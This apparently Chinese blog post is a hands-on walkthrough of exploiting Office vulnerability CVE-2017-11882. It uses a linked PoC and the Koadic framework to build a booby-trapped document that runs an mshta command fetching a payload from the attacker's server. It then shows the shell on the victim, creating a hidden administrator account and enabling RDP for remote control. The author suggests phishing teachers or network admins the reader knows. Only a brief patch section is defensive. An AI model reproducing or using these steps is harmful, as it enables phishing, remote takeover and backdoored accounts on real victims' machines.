FavoriteLoading
0

Office内存破坏漏洞CVE-2017-11882 执行任意代码失败了还可DoS PoC已公开

Microsoft Office再次爆出内存破坏漏洞 ,CVEID CVE-2017-11882 ,攻击者可以利用此问题,在当前登录用户的上下文中执行任意代码。失败的开发尝试可能会导致拒绝服务条件。受影响版本包括,Office 2016、Office 2013、Office 2010、Office 2007的相关版本。

Update:Microsoft Office内存破坏漏洞CVE-2017-11882 PoC已经公开了,之所以流传广泛,是因为这个漏洞无痰喘,用户感觉不到!!! 这里为大家带来简单的复现。。

 

使用到的工具:

渗透工具:kodiac(用于构造payload,获得shell)工具地址:https://github.com/weiruyi123/koadic(这是我修改过的不会出现编码错误的版本)

漏洞Poc:地址:https://github.com/weiruyi123/CVE-2017-11882

(Poc对命令长度有限制,具体可以查看github上的README)

操作环境:

Python2.7

靶机:windows server 2008 R2 standard IP:192.168.1.171

攻击机:一台拥有公网IP的VPS  (因为不想去搞转发,所以用直接用VPS做反弹shell服务给大家展示)

进入bash,cd进入下载的Poc目录,我们可以看到Poc是用python写的所以需要安装python环境。

接下来我们打开win server虚拟机

 

这台win server我安装了office2010

 

 

新安装的虚拟机(没有打任何补丁)。

这里我使用ssh链接我的vps,使用git clone命令下载kodiac。给目录递归加入执行权限后cd进入kodiac的目录然后。/kodiac.py运行,同样这个工具也需要python环境

 

 

然后我们设置好LHOST和LPORT马赛克处填写你的内网ip地址(如果是内网渗透)或者端口转发地址,然后输入run生成payload

 

 

复制’mshta http://IP:2580/acg9N’,然后回到打开Poc目录的bash,Poc的用法是

 

python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

-c 是指远程执行的命令 -o 是指生成的而已文档位置。我们根据情况修改-c处的命令与保存位置,这里根据我生成的payload命令为

python Command_CVE-2017-11882.py -c "mshta http://IP:2580/acg9N" -o test.doc

当然你也可以使用msf生成powershell一句话payload然后替换-c处的参数

 

 

可以看到这里我们成功生成了一个恶意文档,接下来你只需要通过一些社工或者是非正常手段然受害者打开即可,这里我们将而已文档放入win server 虚拟机中打开。

 

 

然后你就会发现kodiac处已经反弹了zombies代号为0的shell,而靶机打开后也没有任何错误提示

 

 

然后接下来我们就可以进行提权操作了,在kodiac中输入?可以查看命令使用方法

 

 

输入use后tap补全会出现一些工具,每个工具的功能在github中有说明

 

 

我们在kodiac中输入zombies可以看到我们的靶机代号为0

 

 

接下来为了操控这台靶机,我们在kodiac中输入cmdshell 0,可以看到了对方cmd,我们用此对靶机进行3389开通用户提权然后远控。

 

 

使用net user adeljck 123456 /add命令在对方机器上创建一个名为adeljck密码是123456的普通用户

 

 

然后输入net localgroup administrators adeljck /add命令将用户adeljck提升为管理员,然后输入net user命令查看结果,可以看到我们已经在对方机器上获得了administrator权限

 

 

接下来我们使用”REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f”命令打开对方的3389端口

 

 

你也可以使用kodiac中的implant/manage/enable_rdesktop模块打开,方法是,输入exit退出shell,然后输入use implant/manage/enable_rdesktop(可tab补全),然后分别输入”set ENABLE true”,” set ZOMBIE 0”,然后输入run即可打开对方的3389.

 

 

然后在在自己的电脑上win + R 输入mstsc /admin

 

 

输入IP地址点击连接,然后输入刚刚我们创建的用户名和密码,点击确定

 

 

然后。。。。你就做你想做的事吧。。。。

 

 

这种攻击方式个人觉得可以结合社工渗透自己身边的老师或者认识的网管什么的,也可以用来展开钓鱼攻击,本文使用的渗透工具是kodiac,是一位大佬在defcon上发布的一个后渗透工具,当让你也可以使用msf,单个人觉得这个足够了。。。

 

修复建议

:1、微软已经对此漏洞做出了修复。 下载https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882 更新补丁进行修补 开启Windows Update功能,定期对系统进行自动更新 2、由于该公式编辑器已经17年未做更新,可能存在大量安全漏洞,建议在注册表中取消该模块的注册。 按下Win R组合键,打开cmd.exe 输入以下两条命令: reg add “HKLM\SOFTWARE\Microsoft\Office\Common\COM Compatibility\{0002CE02-0000-0000-C000-000000000046} ” /v “Compatibility Flags” /t REG_DWORD /d 0x400